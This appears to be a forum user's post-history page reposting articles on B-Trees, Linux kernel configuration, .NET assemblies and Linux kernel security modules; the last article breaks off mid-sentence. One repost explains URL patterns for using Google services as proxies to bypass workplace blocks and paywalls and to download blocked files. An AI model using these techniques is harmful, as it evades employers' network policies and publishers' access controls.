-
Posts
18772 -
Joined
-
Last visited
-
Days Won
730
Everything posted by Nytro
-
[h=1]Trees, B-Trees, B+Trees and H-Trees[/h][h=3]Jarret W. Buse[/h]B+Tree B-Trees are used to help search various data. Some file systems use B+Tree to search directories, extent descriptors, file allocation and even file retrieval. In the future, B+Tree may be used to search through more types of data within the file systems. First, let's look at a Tree, and we'll use letters to represent files (C, F, L, N, P and Z). A Tree is a tree structure (upside down as most people say), which consists of one root node, children nodes and leaf nodes. Each node contains a key and pointer. The key is the search item, such as a file name. The data pointer for the key points to the actual data. So, looking at Figure 1, let's assume File L is entered first in the Tree. FIGURE 1 The next File added is File C. File C is added under the root node and to the left since the value is less than the root (C<Z). Greater values go to the right, so if File Z is added, it goes to the right of the root as shown in Figure 2. FIGURE 2 We have 3 files left to add, so let's add File F, N and P as shown in Figure 3. FIGURE 3 In this case, the Tree is not balanced; that is, there are more nodes to the right of the root than to the left. In some cases, this may be fine. If you access File L more than the others, the search will occur very quickly. Of course with the number of files on some file systems being over 10,000, this Tree would be quite large. From Figure 3, Node L is the root node. Node C is a child node (as is Node Z and N). Nodes F and P are Leaf Nodes. Leaf Nodes are the nodes on the end that have no child nodes. Node C is considered a parent of Nodes F. Node L (root) is the parent of Node C and Z. In an extreme case, the root could be File Z, followed by a child node of File P, then N, L, F and finally C as shown in Figure 4. The layout would produce a very unbalanced tree that most likely would cause lengthy searches. FIGURE 4 Now, B-Tree uses more keys within a node, otherwise referred to as the order. If a B-Tree node contains five pointers, it is a B-Tree of order 5. Let's look at an example of a B-Tree root as shown in Figure 5. FIGURE 5 The dots represent the pointers while the numbers represent the key values (file names, etc.). Notice that for this node, each Key has a partnered Pointer: Key-1 and Pointer-1, Key-2 and Pointer-2, etc. If you look at Figure 5, you notice there is an extra Pointer (Pointer-0). The tree works in a similar way as a regular tree. If the search item we are looking for is less than Key-1, Pointer-0 is followed. If the search item is greater than or equal to Key-1 and less than Key-2, we follow Pointer-1. If the search item is greater than or equal to Key-2 and less than Key-3, we follow Pointer-2. For example, if we were searching for number 1, we would follow Pointer-0. If we were searching for 12, we would follow Pointer-2. By following these pointers, we are led to another node to perform the same task and so on until we reach a leaf which contains the search value. The search value points to our file we are searching for or the search item is not found and an error message is returned. Take a look at Figure 6 for the following example. FIGURE 6 Let's say we are searching for 5. We start at the root node and determine if the search value is less than Key-1 (3). Since it is not, we see if the search value is between Key-1 (3) and Key-2 (10), which it is so we follow Pointer-1. At this node, we check if the search value is less than Key-1 (5), it is not. Our search value is equal to Key-1 (5) so we follow Pointer-1 and find two leaf nodes (5 and 6). The first value matches our search, so we use the value in the leaf node to get to the file for which we have been searching. Now, let's say we are searching for File-18. We start at the root and follow Pointer-2 since our search value is greater than or equal to Key-2 (10). At the next node, we have three key values to check: 10, 15 and 22. We know that 18 is greater than 10 and 15, so we can skip Pointer-0 and Pointer-1, and we follow Pointer-2. At the leaf nodes, we find two leaves, 15 and 20. File-18 does not exist and a message can alert the user that there is no such file. NOTE: Be aware that these searches typically are extremely fast. You can see how a tree can allow for faster searching than going through a whole sequential file. Now to move on to the more difficult parts: insertion and deletion. For Figure 6, let's add File-12. The first thing that is done when doing an insertion or deletion is to search for the entry that is being inserted or deleted. This is done for specific reasons: Insertion - the entry must not already exist Deletion - the entry must already exist If the entry to be inserted exists, or the entry to delete does not exist, a message is generated. In the case of an indexed file listing for a file system, if a file exists that we are copying to the harddisk, we get a query asking to overwrite the file (it was found in the B-Tree). If we want to delete a file that does not exist, we get an error that the file does not exist. Now, to get to the details of inserting File-12; if you look at Figure 6, we follow Pointer-2 to the next node. File-12 is greater than Key-1 (10) and less than Key-2 (15), so we follow Pointer-1. Now we find two leaf nodes (10 and 14). File-12 should be inserted between the two as shown in Figure 7. File-12 is placed between the leaves since it goes there, and since it falls between Leaf-10 and Leaf-14, no entries need to be made in a node. FIGURE 7 Now, let's look at the possibility of adding File-8. Looking at Figure 7, we can see the File-8 would be searched for, from the root, down Pointer-1. File-8 does not fit in this node anywhere, so another key must be made: Key-3 (8) as shown in Figure 8. FIGURE 8 Now we can try another. Let's add File-30. Following Pointer-2 from the root, we get to a node that has one space left, and File-30 is added there as shown in Figure 9. FIGURE 9 What happens if we want to add File-40? Well, if the B-tree is an order 5, we can only have five pointers per node. By adding File-40, we would create a node with more than five pointers. To accomplish the insertion, we take the node that is full and remove half the keys and pointer pairs. These entries will then be placed in a new node. All associated leaves will be moved as well, as shown in Figure 10. NOTE: Each node must contain at least 2 keys (the root is the exception). FIGURE 10 The keys (22 and 30) are moved to a new node. The largest leaf value (20) is added to the previous node Key-3 so we now have a new high end for the node. Key-2 will now become File-40 when inserting the new key. The first Key (30) of the new node must be placed in the root and a pointer associated with it. As you can see, File-22 and File-27 are placed in leaf nodes with Pointer-0 pointing to it. NOTE: When something changes, the effect can "ripple" up to the root node. This is extremely true for large B-Trees which may have fuller nodes. Looking at Figure 10, if one of the following entries were to be deleted (6, 9, 12, 14, 22, or 27), these could be removed with no further actions. A search would be performed and once the entry was found, the leaf would be deleted. For example, to delete File-9 from the B-Tree would result in Figure 11. FIGURE 11 Now, let’s look at what happens if we remove File-5. File-5 can easily be removed, but it is also a key. Here the key would be removed as well. Keys (7 and 8) to the right of the key would be moved to the left. Any leaf nodes not being removed (6) would be moved to be with the leaves (3) to the left as well as shown in Figure 12. FIGURE 12 If we removed File-30, the same would happen, but the key in the root would change to the new Key-1 for the node as shown in Figure 13. FIGURE 13 If we also removed File-40, the last node would be removed as well as Key-3 in the root node as shown in Figure 14. The leaves 22 and 27 can be moved to the left node. FIGURE 14 The difference between the B-Tree and B+Tree is that a B+Tree allows for data to be stored in the leaves only, while a B-Tree can store data in the Nodes. B+Trees can also store keys with the same data to allow for redundant data, but B-Trees cannot do this. Note: Another type of Tree is the H-Tree. The H-Tree is the same as a B+Tree except that the keys are not a file name, directory name or whatever is being searched, but the keys are hashes. A hash is made of the key being placed into the H-Tree. Sursa: Trees, B-Trees, B+Trees and H-Trees | Linux.org
-
[h=1]The Linux Kernel: Configuring the Kernel (Part 1)[/h][h=3]DevynCJohnson[/h]Now that we understand the Linux kernel, we can move on to the main event - configuring and compiling the code. Configuring code for the kernel does take a lot of time. The configuration tool asks many questions and allows developers to configure every aspect of the kernel. If unsure about any question or feature, it is best to pick the default value provided by the configuration tool. This tutorial series will walk readers through the whole process of configuring the kernel. To configure the code, open a terminal in the main source code folder. Once a terminal is up, there are a few ways to configure the code based on the preferred configuration interface. make config - Plain text interface (most commonly used choice) make menuconfig - Text-based with colored menus and radiolists. This options allows developers to save their progress. - ncurses (ncurses-devel) must be installed make nconfig - Text-based colored menus - curses (libcdk5-dev) must be installed make xconfig - QT/X-windows interface – QT is required make gconfig - Gtk/X-windows interface – GTK is required make oldconfig - Plain text interface that defaults questions based on the local config file make silentoldconfig - This is the same as oldconfig except the questions answered by the config file will not be shown make olddefconfig - This is like silentoldconfig except some questions are answered by their defaults make defconfig - This option creates a config file that uses default settings based on the current system's architecture. make ${PLATFORM}_defconfig - Creates a config file using values from arch/$ARCH/configs/${PLATFORM}_defconfig. make allyesconfig - This option creates a config file that will answer yes to as many questions as possible. make allmodconfig - This option creates a config file that will make as many parts of the kernel a module as possible NOTE: Code in the Linux kernel can be put in the kernel itself or made as a module. For instance, users can add Bluetooth drivers as a module (separate from the kernel), add to the kernel itself, or not add at all. When code is added to the kernel itself, the kernel requires more RAM space and boot-up time may take longer. However, the kernel will perform better. If code is added as modules, the code will remain on the hard-drive until the code is needed. Then, the module is loaded to RAM. This will reduce the kernel's RAM usage and decrease boot time. However, the kernel's performance may suffer because the kernel and the modules will be spread throughout the RAM. The other choice is to not add some code. For illustration, a kernel developer may know that a system will never use Bluetooth devices. As a result, the drivers are not added to the kernel. This improves the kernel's performance. However, if users later need Bluetooth devices, they will need to install Bluetooth modules or update the whole kernel. make allnoconfig - This option creates a config file that will only add essential code to the kernel; this answers no to as many questions as possible make randconfig - This option makes random choices for the kernel make localmodconfig - This option creates a config file based on the current list of loaded modules and system configuration. make localyesconfig - This will set all module options to yes - most of the kernel will be in modules TIP: It is best to use “make menuconfig” because users can save their progress. “make config” does not offer this luxury. Because the configuration process takes a lot of time, Configuration: Most developers choose "make menuconfig" or one of the other graphical menus. After typing the desired command, the first question asks whether the kernel to be built is going to be a 64-bit kernel or not. The choices are "Y", "n", and "?". The question mark explains the question, "n" answers no to the question, and "Y" answers yes to the question. For this tutorial, I will choose yes. To do this I type "Y" (this is case-insensitive) and hit enter. NOTE: If the kernel is compiled on a 32-bit system, then the configuration tool would ask if the kernel should be 32-bit. The first question is different on other processors. The next line shows "Cross-compiler tool prefix (CROSS_COMPILE) []". If you are not cross-compiling, hit enter. If you are cross-compiling, type something like "arm-unknown-linux-gnu-" for ARM systems or "x86_64-pc-linux-gnu-" for 64-bit PC systems. There are many other possible commands for other processor types, but the list can be quite large. Once a developer knows what processor they want to support, it is easy to research the command needed for that processor. NOTE: Cross-compiling is compiling code to be used on other processors. For illustration, an Intel system that is cross-compiling code is making applications for processors other than Intel. So, this system may be compiling code for ARM or AMD processors. NOTE: Each choice will change which questions come up and when they are displayed. I will include my choices so readers can follow the configuration process on their own system. Next, users will see "Local version - append to kernel release (LOCALVERSION) []". This is where developers can give a special version number or name to their customized kernel. I will type "LinuxDotOrg". The kernel version is now “3.9.4-LinuxDotOrg”. Next, the configuration tool asks "Automatically append version information to the version string (LOCALVERSION_AUTO) [N/y/?]". If a git tree is found, the revision number will be appended. This example is not using git, so I will answer no. Other wise the git revision number will be appended to the version. Remember vmlinuz and similar files? Well, the next question asks which compression format should be used. The developer can choose one through five. The choices are 1. Gzip (KERNEL_GZIP) 2. Bzip2 (KERNEL_BZIP2) 3. LZMA (KERNEL_LZMA) 4. XZ (KERNEL_XZ) 5. LZO (KERNEL_LZO) Gzip is the default, so I will press “1” and hit enter. Each compression format has greater or less compression ratios compared to the other formats. A better compression ratio means a smaller file, but more time is needed to uncompress the file while the opposite applies to lower compression ratios. Now, this line is displayed - “Default hostname (DEFAULT_HOSTNAME) [(none)]”. The default hostname can be configured. Usually, developers leave this blank (I left it blank) so that Linux users can set up their own hostname. Next, developers can enable or disable the use of swap space. Linux uses a separate partition called “swap space” to use as virtual memory. This is equivalent to Windows' paging file. Typically, developers answer yes for the line “Support for paging of anonymous memory (swap) (SWAP) [Y/n/?]”. The next line (System V IPC (SYSVIPC) [Y/n/?]) asks if the kernel should support IPC. Inter Process Communication allows processes to communicate and sync. It is best to enable IPC, otherwise, many applications will not work. Answering yes to this question will cause the configuration tool to ask “POSIX Message Queues (POSIX_MQUEUE) [Y/n/?]”. This question will only be seen if IPC is enabled. POSIX message queues is a messaging queue (a form of interprocess communication) where each message is given a priority. The default choice is yes. Hit enter to choose the default choice (indicated by the capitalized choice). The next question (open by fhandle syscalls (FHANDLE) [Y/n/?]) is asking if programs will be permitted to use file handles instead of filenames when performing filesystem operations if needed. By default, the answer is yes. Sometimes, when a developer has made certain choices, some questions will automatically be answered. For instance, the next question (Auditing support (AUDIT) [Y/?]) is answered yes without prompting because previous choices require this feature. Auditing-support logs the accesses and modifications of all files. The next question relates to auditing (Enable system-call auditing support (AUDITSYSCALL) [Y/n/?]). If enabled, all system calls are logged. If the developer wants performance, then as much auditing features as possible should be disabled and not added to the kernel. Some developers may enable auditing for security monitoring. I will select “no” for this question. The next audit question (Make audit loginuid immutable (AUDIT_LOGINUID_IMMUTABLE) [N/y/?]) is asking if processes can change their loginuid (LOGIN User ID). If enabled, processes in userspace will not be able to change their own loginuids. For better performance, we will disable this feature. NOTE: When configuring via “make config”, the questions that are answered by the configuration tool are displayed, but the user does not have a way to change the answer. When configuring via “make menuconfig”, the user cannot change the option no matter what button is pressed. Developers should not want to change options like that anyway because a previous choice requires another question to be answered a certain way. In the next article, we can configure the IRQ subsystem and all of the following choices. Sursa: The Linux Kernel: Configuring the Kernel (Part 1) | Linux.org
-
[h=1].NET Assembly Programming[/h]Ajay Yadav July 16, 2013 Abstract In this series, we’ll examine the core details of creating, deploying and configuring .NET assemblies and its advantage over existing COM technology. This article goes deeper in terms of understanding the role and format of .NET assembly and modules. You ‘ll explore assembly manifest and how exactly the .NET runtime resolve the location of assembly and you ‘ll also come to understand the assembly CIL code .This article will also state the distinction between single file and multi-file assemblies. Problem with COM Microsoft itself introduced the phrase “DLL Hell” to describe traditional problem with existing COM DLLs. Often old DLL’s are replaced by a new version, and will break applications because a newly installed application overwrites a DLL that has also been used by another application. In fact, such problems occur due to improperly checked versions of DLL by the installation program, while new DLL should be backward compatible with the old version to keep the continuity of existing functionality. The side-by-side DLL installation feature provided by the existing the COM technology is unavailable. Various DLL incorporated functionality features are also referenced to another couple of locations but such functionality is terminated when the old version is replaced by a new functionality version. You can install two different types of a single assembly in a side-by-side installation feature. Although, this can be applied with COM DLLs but a problem will arise in such a case. Literally, COM DLLs are not self-describing. The configuration of a COM component is stored in the registry, not in the Component DLL itself. So the configuration information is taken from the last version rather than two versions of a single DLL simultaneously. Understanding Assembly The .NET Framework overcomes the DLL Hell or Version issues with existing COM Technology by introducing assemblies. Assemblies are self-describing installation units, consisting of single or multiple files. Virtually, every file that is developed and executed under the .NET Common Language Runtime (CLR) is called, an assembly. One Assembly file contains metadata and could be an .EXE, DLL or Resource file. Now, let’s discuss some of the comprehensive benefits provided by the assembly. Assemblies can be deployed as private or shared. Private assemblies reside in the same solution directory. Shared assemblies, on the other hand, are libraries intended to be consumed by numerous applications on a single machine, because they are deployed to a central repository called GAC. The .NET assemblies are assigned a special 4-digit number to concurrently run the multiple versions of an assembly. The 4-digit special number can be specified as “<major>.<minor>.<build>.<revision>”. In assembly archives every external assembly reference must have access in order to function properly. However, assemblies are self-describing by documenting all the external references in the manifest. The comprehensive details of assemblies such as member function, variable name, base class, interface and constructors are placed in the metadata so that CLR does not need to consult the windows system registry to resolve its location. The .NET framework offers you to reuse types in a language-independent manner by not caring how a code library is packaged. Application isolation is ensured using application domains. A number of applications can run independently inside a single process with an application domain. Installation of an assembly can be as simple as copying all of its files. Unlike COM, there is no need to register them in a windows system registry. Modules Before delving into assembly types in detail, let’s discuss the modules. An assembly is typically, composed of multiple modules. A module is a DLL without assembly attributes. To get a better understanding, we are creating a c# class library project as the following: public class test { public test() { } public test(string fname, string lname) { this.FName = fname; this.LName = lname; } public string FName { get; set; } public string LName { get; set; } public override string ToString() { return FName + " " +LName; } } A module can be created by csc.exe with /module switch. The following command creates a module test.netmodule as; csc /target:module test.cs A module also has a manifest, but there isn’t an .assembly entry inside the manifest because a module doesn’t have a assembly attribute. We can view a module manifest using ildasm utility as following: The main objective behind modules is that they can be used for faster startup of assemblies, because not all types are inside a single file. The modules are loaded when needed. Secondly, if you want to create an assembly with more than one programming language then one module could be in VB.NET and another in F#.NET. Finally, these two modules could be included in a single file. Single file and Multi-file Assembly Technically speaking, an assembly can be formed from a single file and multi-file. A single file assembly contains all the necessary elements such as CIL code, header files and manifests in a single *.exe or *.dll package. A multi-file assembly, on the other hand, is a set of .NET modules that are deployed and versioned as a single unit. Formally speaking, these modules are termed as primary and secondary modules. The primary module contains an assembly-level manifest and secondary modules which having *.netmodule extension contains a module-level manifest. The major benefit of multi-file assembly is that they provide a very efficient way to download content. Assembly Structure An assembly is comprised of assembly metadata describing the complete assembly, type metadata unfolding the exported type and methods, MSIL code and resources. All these fragments can be inside of one file or spread across several files. Structurally speaking, an assembly is composed of the following elements: CIL code The CIL code is a CPU and platform-agnostic intermediate language. It can be considered the core back-bone of an assembly. Given this design, the .NET assemblies can indeed execute on a variety of devices, architectures and operating systems. At the runtime, the internal CIL is compiled using the Just0in-time (JIT) compiler, as per to platform and CPU specific instructions. Understanding the grammar of CIL code can be helpful when you are building complex application but unfortunately most .NET developers don’t need to be deeply concerned with the details of CIL code. Windows File Header The windows file header determines how the Windows family of operating systems can load and manipulate an assembly. The headers also identify the kind of application such as *.dll, console or GUI applications, to be hosted by windows. You can view the assembly header information using the dumpbin.exe utility as following: Dumpbin /headers *.dll/*.exe CLR File Header The CLR header is a block of data that all .NET assemblies must support in order to be hosted by the CLR. They are typically defined as – numerous flags that enables the runtime to understand the layout of the managed code. We can view such diverse flags using again, dumpbin.exe /clrheader flag as the following: Metadata The .NET runtime practices metadata to resolve the location of types within the binary. An assembly metadata comprehensively describes the format of the contained types, as well as the format of external type references. If you press the Ctrl +M keystroke combination, idasm.exe display the metadata for each type within the DLL file assembly as shown below: Manifest The assembly manifest documents each module within the assembly, establishes the version and acknowledges the external reference assemblies with its dependencies. The Assembly manifest is a significant part of an assembly, and can be composed in the following parts as; Identity It includes version, name, culture and public key details. Set of Permissions This portion displays the necessary permissions to run an assembly. List of Files It lists all files belonging to a single file or multiple file assemblies. External reference Assemblies The manifest also documents the external reference files that are needed to run an assembly. We can explore the assembly manifest using the ildasm.exe utility as following; Now, open the CSharpTest.dll manifest by double –clicking the MANIFEST icon. The first code block specifies all external assemblies such as mscorlib.dll required by the current assembly to function correctly. Here, each .assembly external block is qualified by the .publickeytoken and .ver directive as following: Typically, these setting can be configured manually which resides in the solution AssemblyInfo.cs file as: using System.Reflection;using System.Runtime.CompilerServices; using System.Runtime.InteropServices; [assembly: AssemblyTitle("CsharpTest")] [assembly: AssemblyDescription("")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCompany("")] [assembly: AssemblyProduct("CsharpTest")] [assembly: AssemblyCopyright("Copyright © 2013")] [assembly: AssemblyTrademark("")] [assembly: AssemblyCulture("")] [assembly: ComVisible(false)] // The following GUID is for the ID of the typelib if this project is exposed to COM [assembly: Guid("2fcf6717-f595-4216-bb93-f6590e37b3e5")] [assembly: AssemblyVersion("1.0.0.0")] [assembly: AssemblyFileVersion("1.0.0.0")] Resources Finally, a .NET assembly may contain a number of embedded resources, such as picture files, application icons, sound file and culture information (satellite assemblies in order to build international software). Summary This article drilled down into the details of how the CLR resolves the location of external reference assemblies. We began by exploring the disadvantage of existing COM technology, and examined the content within an assembly such as CIL code, header, metadata, manifest and resources. We have also come to understand the distinction between the single file and multi-file assembly. This article also focuses the benefits of modules and assembly in depth. Later, we will also explore the more advance topics related to assembly. Sursa: .NET Assembly Programming
-
Puneti mana pe carte sau: Timesnewroman.ro - Cotidian independent de umor voluntar - ?Au început admiterile: 6 pe un loc la McDonalds, 13 pe un loc la Dristor Kebab
-
The Hacker Crackdown Law and Disorder on the Electronic Frontier Bruce Sterling bruces@well.sf.ca.us [*] Translated to HTML by Bryan O'Sullivan (bos@scrg.cs.tcd.ie). Contents Preface to the Electronic Release of The Hacker Crackdown Chronology of the Hacker Crackdown Introduction Part 1: Crashing the System A Brief History of Telephony / Bell's Golden Vaporware / Universal Service / Wild Boys and Wire Women / The Electronic Communities / The Ungentle Giant / The Breakup / In Defense of the System / The Crash PostMortem / Landslides in Cyberspace Part 2: The Digital Underground Steal This Phone / Phreaking and Hacking / The View From Under the Floorboards / Boards: Core of the Underground / Phile Phun / The Rake's Progress / Strongholds of the Elite / Sting Boards / Hot Potatoes / War on the Legion / Terminus / Phile 9-1-1 / War Games / Real Cyberpunk Part 3: Law and Order Crooked Boards / The World's Biggest Hacker Bust / Teach Them a Lesson / The U.S. Secret Service / The Secret Service Battles the Boodlers / A Walk Downtown / FCIC: The Cutting-Edge Mess / Cyberspace Rangers / FLETC: Training the Hacker-Trackers Part 4: The Civil Libertarians NuPrometheus + FBI = Grateful Dead / Whole Earth + Computer Revolution = WELL / Phiber Runs Underground and Acid Spikes the Well / The Trial of Knight Lightning / Shadowhawk Plummets to Earth / Kyrie in the Confessional / $79,499 / A Scholar Investigates / Computers, Freedom, and Privacy Electronic Afterword to The Hacker Crackdown Sursa: The Hacker Crackdown Info: The Hacker Crackdown - Wikipedia, the free encyclopedia
-
Use Google as a Proxy Server to Bypass Paywalls, Download Files If you have trouble accessing a web page either because the website is blocked at your workplace, or because that page happens to be behind a paywall, there are a couple of undocumented Google proxy servers that may help you read that page. When you access any page via one of these Google proxies, the content of that page gets downloaded on Google servers and then served to you. The lesser-known gmodules.com proxy, discussed later, will even allow you to download documents, videos and other web files that are otherwise blocked. 1. Google Translate as a Proxy To use Google Translate as a proxy, set the destination language as the actual language of the page and the source language as anything but the destination language. For instance, if you are to access a page written in English, set the destination language (tl) in the translate URL as “en” and the source language (sl) as “ja” for Japanese. (example) http://translate.google.com/translate?sl=ja&tl=en&u=http://example.com/ Advantage: This is the most popular Google proxy and the download web pages looks exactly like the original provided the domains serving the images and CSS aren’t blocked at your place. 2. Google Mobilizer as a Proxy Next in the list is Google’s Mobilizer service. Google has discontinued the main mobilizer service on google.com (secure) but you can still access it through any country-specific Google domain like google.co.in or google.ie. The URL would be: http://www.google.ie/gwt/x?u=http://example.com/ (example) Advantage: The presentation (CSS) isn’t retained but this mode is perfect for reading text-heavy pages and do have the option of disabling inline images for faster loading. 3. Google Modules as a Proxy The gmodules.com domain is part of the Google personalized homepage service and is primarily used for hosting gadgets that are available for the Google homepage. http://www.gmodules.com/ig/proxy?url=http://example.com/ (example) Advantage: This is the only Google proxy that will let you download files (like PDFs, .MP4 videos, etc) in addition to viewing regular web pages. Finally, if none of the above proxies work, you can always check the Google Cache or create your proxy server using either this Google Script or the more advanced Google App Engine. Sursa: How to Use Google as a Proxy Server
-
Overview of Linux Kernel Security Features Thursday, 11 July 2013 10:00 administrator Editor's Note: This is a guest post from James Morris, the Linux kernel security subsystem maintainer and manager of the mainline Linux kernel development team at Oracle. In this article, we'll take a high-level look at the security features of the Linux kernel. We'll start with a brief overview of traditional Unix security, and the rationale for extending that for Linux, then we'll discuss the Linux security extensions. Unix Security – Discretionary Access Control Linux was initially developed as a clone of the Unix operating system in the early 1990s. As such, it inherits the core Unix security model—a form of Discretionary Access Control (DAC). The security features of the Linux kernel have evolved significantly to meet modern requirements, although Unix DAC remains as the core model. Briefly, Unix DAC allows the owner of an object (such as a file) to set the security policy for that object—which is why it's called a discretionary scheme. As a user, you can, for example, create a new file in your home directory and decide who else may read or write the file. This policy is implemented as permission bits attached to the file's inode, which may be set by the owner of the file. Permissions for accessing the file, such as read and write, may be set separately for the owner, a specific group, and other (i.e. everyone else). This is a relatively simple form of access control lists (ACLs). Programs launched by a user run with all of the rights of that user, whether they need them or not. There is also a superuser—an all-powerful entity which bypasses Unix DAC policy for the purpose of managing the system. Running a program as the superuser provides that program with all rights on the system. Extending Unix Security Unix DAC is a relatively simple security scheme, although, designed in 1969, it does not meet all of the needs of security in the Internet age. It does not adequately protect against buggy or misconfigured software, for example, which may be exploited by an attacker seeking unauthorized access to resources. Privileged applications, those running as the superuser (by design or otherwise), are particularly risky in this respect. Once compromised, they can provide full system access to an attacker. Functional requirements for security have also evolved over time. For example, many users require finer-grained policy than Unix DAC provides, and to control access to resources not covered by Unix DAC such as network packet flows. It's worth noting that a critical design constraint for integrating new security features into the Linux kernel is that existing applications must not be broken. This is general constraint imposed by Linus for all new features. The option of designing a totally new security system from the ground up is not available—new features have to be retrofitted and compatible with the existing design of the system. In practical terms, this has meant that we end up with a collection of security enhancements rather than a monolithic security architecture. We'll now take a look at the major Linux security extensions. Extended DAC Several of the first extensions to the Linux security model were to enhancements of existing Unix DAC features. The proprietary Unix systems of the time had typically evolved their own security enhancements, often very similarly to each other, and there were some (failed) efforts to standardize these. POSIX ACLs POSIX Access Control Lists for Linux are based on a draft POSIX standard. They extend the abbreviated Unix DAC ACLs to a much finer-grained scheme, allowing separate permissions for individual users and different groups. They're managed with the setfacl and getfacl commands. The ACLs are managed on disk via extended attributes, an extensible mechanism for storing metadata with files. POSIX Capabilities POSIX Capabilities are similarly based on a draft standard. The aim of this feature is to break up the power of the superuser, so that an application requiring some privilege does not get all privileges. The application runs with one or more coarse-grained privileges, such as CAP_NET_ADMIN for managing network facilities. Capabilities for programs may be managed with the setcap and getcap utilities. It's possible to reduce the number of setuid applications on the system by assigning specific capabilities to them, however, some capabilities are very coarse-grained and effectively provide a great deal of privilege. Namespaces Namespaces in Linux derive from the Plan 9 operating system (the successor research project to Unix). It's a lightweight form of partitioning resources as seen by processes, so that they may, for example, have their own view of filesystem mounts or even the process table. This is not primarily a security feature, but is useful for implementing security. One example is where each process can be launched with its own, private /tmp directory, invisible to other processes, and which works seamlessly with existing application code, to eliminate an entire class of security threats. The potential security applications are diverse. Linux Namespaces have been used to help implement multi-level security, where files are labeled with security classifications, and potentially entirely hidden from users without an appropriate security clearance. On many systems, namespaces are configured via Pluggable Authentication Modules (PAM)--see the pam_namespace(8) man page. Network Security Linux has a very comprehensive and capable networking stack, supporting many protocols and features. Linux can be used both as an endpoint node on a network, and also as a router, passing traffic between interfaces according to networking policies. Netfilter is an IP network layer framework which hooks packets which pass into, through and from the system. Kernel-level modules may hook into this framework to examine packets and make security decisions about them. iptables is one such module, which implements an IPv4 firewalling scheme, managed via the userland iptables tool. Access control rules for IPv4 packets are installed into the kernel, and each packet must pass these rules to proceed through the networking stack. Also implemented in this codebase is stateful packet inspection and Network Access Translation (NAT). Firewalling is similarly implemented for IPv6. ebtables provides filtering at the link layer, and is used to implement access control for Linux bridges, while arptables provides filtering of ARP packets. The networking stack also includes an implementation of IPsec, which provides confidentiality, authenticity, and integrity protection of IP networking. It can be used to implement VPNs, and also point to point security. Cryptography A cryptographic API is provided for use by kernel subsystems. It provides support for a wide range of cryptographic algorithms and operating modes, including commonly deployed ciphers, hash functions, and limited support for asymmetric cryptography. There are synchronous and asynchronous interfaces, the latter being useful for supporting cryptographic hardware, which offloads processing from general CPUs. Support for hardware-based cryptographic features is growing, and several algorithms have optimized assembler implementations on common architectures. A key management subsystem is provided for managing cryptographic keys within the kernel. Kernel users of the cryptographic API include the IPsec code, disk encryption schemes including ecryptfs and dm-crypt, and kernel module signature verification. Linux Security Modules The Linux Security Modules (LSM) API implements hooks at all security-critical points within the kernel. A user of the framework (an “LSM”) can register with the API and receive callbacks from these hooks. All security-relevant information is safely passed to the LSM, avoiding race conditions, and the LSM may deny the operation. This is similar to the Netfilter hook-based API, although applied to the general kernel. The LSM API allows different security models to be plugged into the kernel—typically access control frameworks. To ensure compatibility with existing applications, the LSM hooks are placed so that the Unix DAC checks are performed first, and only if they succeed, is LSM code invoked. The following LSMs have been incorporated into the mainline Linux kernel: SELinux Security Enhanced Linux (SELinux) is an implementation of fine-grained Mandatory Access Control (MAC) designed to meet a wide range of security requirements, from general purpose use, through to government and military systems which manage classified information. MAC security differs from DAC in that the security policy is administered centrally, and users do not administer policy for their own resources. This helps contain attacks which exploit userland software bugs and misconfiguration. In SELinux, all objects on the system, such as files and processes, are assigned security labels. All security-relevant interactions between entities on the system are hooked by LSM and passed to the SELinux module, which consults its security policy to determine whether the operation should continue. The SELinux security policy is loaded from userland, and may be modified to meet a range of different security goals. Many previous MAC schemes had fixed policies, which limited their application to general purpose computing. SELinux is implemented as a standard feature in Fedora-based distributions, and widely deployed. Smack The Smack LSM was designed to provide a simple form of MAC security, in response to the relative complexity of SELinux. It's also implemented as a label-based scheme with a customizable policy. Smack is part of the Tizen security architecture and has seen adoption generally in the embedded space. AppArmor AppArmor is a MAC scheme for confining applications, and was designed to be simple to manage. Policy is configured as application profiles using familiar Unix-style abstractions such as pathnames. It is fundamentally different to SELinux and Smack in that instead of direct labeling of objects, security policy is applied to pathnames. AppArmor also features a learning mode, where the security behavior of an application is observed and converted automatically into a security profile. AppArmor is shipped with Ubuntu and OpenSUSE, and is also widely deployed. TOMOYO The TOMOYO module is another MAC scheme which implements path-based security rather than object labeling. It's also aimed at simplicity, by utilizing a learning mode similar to AppArmor's where the behavior of the system is observed for the purpose of generating security policy. What's different about TOMOYO is that what's recorded are trees of process invocation, described as “domains”. For example, when the system boots, from init, as series of tasks are invoked which lead to a logged in user running a shell, and ultimately executing a command, say ping. This particular chain of tasks is recorded as a valid domain for the execution of that application, and other invocations which have not been recorded are denied. TOMOYO is intended for end users rather than system administrators, although it has not yet seen any appreciable adoption. Yama The Yama LSM is not an access control scheme like those described above. It's where miscellaneous DAC security enhancements are collected, typically from external projects such as grsecurity. Currently, enhanced restrictions on ptrace are implemented in Yama, and the module may be stacked with other LSMs in a similar manner to the capabilities module. Audit The Linux kernel features a comprehensive audit subsystem, which was designed to meet government certification requirements, but also actually turns out to be useful. LSMs and other security components utilize the kernel Audit API. The userland components are extensible and highly configurable. Audit logs are useful for analyzing system behavior, and may help detect attempts at compromising the system. Seccomp Secure computing mode (seccomp) is a mechanism which restricts access to system calls by processes. The idea is to reduce the attack surface of the kernel by preventing applications from entering system calls they don't need. The system call API is a wide gateway to the kernel, and as with all code, there have and are likely to be bugs present somewhere. Given the privileged nature of the kernel, bugs in system calls are potential avenues of attack. If an application only needs to use a limited number of system calls, then restricting it to only being able to invoke those calls reduces the overall risk of a successful attack. The original seccomp code, also known as “mode 1”, provided access to only four system calls: read, write, exit, and sigreturn. These are the minimum required for a useful application, and this was intended to be used to run untrusted code on otherwise idle systems. A recent update to the code allows for arbitrary specification of which system calls are permitted for a process, and integration with audit logging. This “mode 2” seccomp was developed for use as part of the Google Chrome OS. Integrity Management The kernel's integrity management subsystem may be used to maintain the integrity of files on the system. The Integrity Measurement Architecture (IMA) component performs runtime integrity measurements of files using cryptographic hashes, comparing them with a list of valid hashes. The list itself may be verified via an aggregate hash stored in the TPM. Measurements performed by IMA may be logged via the audit subsystem, and also used for remote attestation, where an external system verifies their correctness. IMA may also be used for local integrity enforcement via the Appraisal extension. Valid measured hashes of files are stored as extended attributes with the files, and subsequently checked on access. These extended attributes (as well as other security-related extended attributes), are protected against offline attack by the Extended Verification Module(EVM) component, ideally in conjunction with the TPM. If a file has been modified, IMA may be configured via policy to deny access to the file. The Digital Signature extension allows IMA to verify the authenticity of files in addition to integrity by checking RSA-signed measurement hashes. A simpler 